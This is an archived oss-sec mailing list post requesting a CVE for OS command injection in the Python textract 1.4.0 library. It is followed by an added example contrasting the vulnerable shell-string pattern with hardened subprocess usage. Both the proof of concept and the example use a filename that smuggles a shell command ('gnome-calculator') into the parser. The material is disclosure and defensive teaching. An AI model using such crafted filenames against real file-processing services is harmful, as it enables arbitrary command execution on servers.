oss-sec mailing list archives

CVE request - textract 1.4.0 - OS Command Injection


From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 20 Oct 2016 17:40:50 -0400

The Python textract component (https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection.

This fork contains a fix:
https://github.com/pierre-ernst/textract


Parsing a file with a malicious name leads to arbitrary OS command injection; this is especially risky when parsing user-supplied files on a server (e.g. uploaded files).

PoC:

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
with open(fileName, 'w+') as f:
    f.write('Pierre Ernst, Salesforce')

# parse newly created file; the unescaped name is interpolated into the shell command
text = textract.process(fileName)
print(text)

# cleanup
os.remove(fileName)


-- 
Pierre Ernst
Salesforce
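Added example (not part of the original post or of the textract project): the injection above comes from interpolating a filename into a shell command string. The block below contrasts that pattern with the hardened forms a parser wrapper should use: an argument vector passed to subprocess without a shell, shlex.quote when a shell string is unavoidable, and an allow-list check on the name. The `pdftotext` command line and the sample filename (which reuses the post's payload shape) are constructed for illustration.

```python
import re
import shlex
import subprocess
import sys

# Constructed sample name mirroring the shape of the PoC's filename.
MALICIOUS_NAME = 'test";gnome-calculator;#.pdf'

# Allow-list for file names handed to external tools: letters, digits, dot, dash, underscore.
SAFE_NAME_RE = re.compile(r'^[A-Za-z0-9._-]+$')


def unsafe_command(filename):
    """Vulnerable pattern: the name is pasted into a string a shell will parse.
    Returned only for inspection; it is never executed here."""
    return 'pdftotext "%s" -' % filename


def safe_command(filename):
    """Hardened form: an argv list. With shell=False no shell sees the name,
    so quotes, ';' and '#' are ordinary bytes inside one argument."""
    return ['pdftotext', filename, '-']


def safe_shell_string(filename):
    """If a shell string cannot be avoided, quote the argument so the shell
    treats the whole name as a single word."""
    return 'pdftotext %s -' % shlex.quote(filename)


def is_safe_filename(filename):
    """Defence in depth: reject names outside a strict allow-list before
    they reach any external tool."""
    return bool(SAFE_NAME_RE.match(filename))


def run_with_filename(filename):
    """Show that an argv vector delivers the name verbatim to the child.
    Uses the Python interpreter itself as the child so it runs anywhere;
    the child simply echoes argv[1] back."""
    proc = subprocess.run(
        [sys.executable, '-c', 'import sys; sys.stdout.write(sys.argv[1])', filename],
        stdout=subprocess.PIPE,
        check=True,
    )
    return proc.stdout.decode()


if __name__ == '__main__':
    print('unsafe :', unsafe_command(MALICIOUS_NAME))
    print('argv   :', safe_command(MALICIOUS_NAME))
    print('quoted :', safe_shell_string(MALICIOUS_NAME))
    print('allowed:', is_safe_filename(MALICIOUS_NAME))
    print('child saw:', run_with_filename(MALICIOUS_NAME))
```

The argv form is the one to prefer: it removes the shell from the path entirely, so there is nothing to escape. shlex.quote is a fallback for code that must build a string for `shell=True`, and the allow-list check is a cheap extra gate for upload handlers that store files under user-chosen names.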
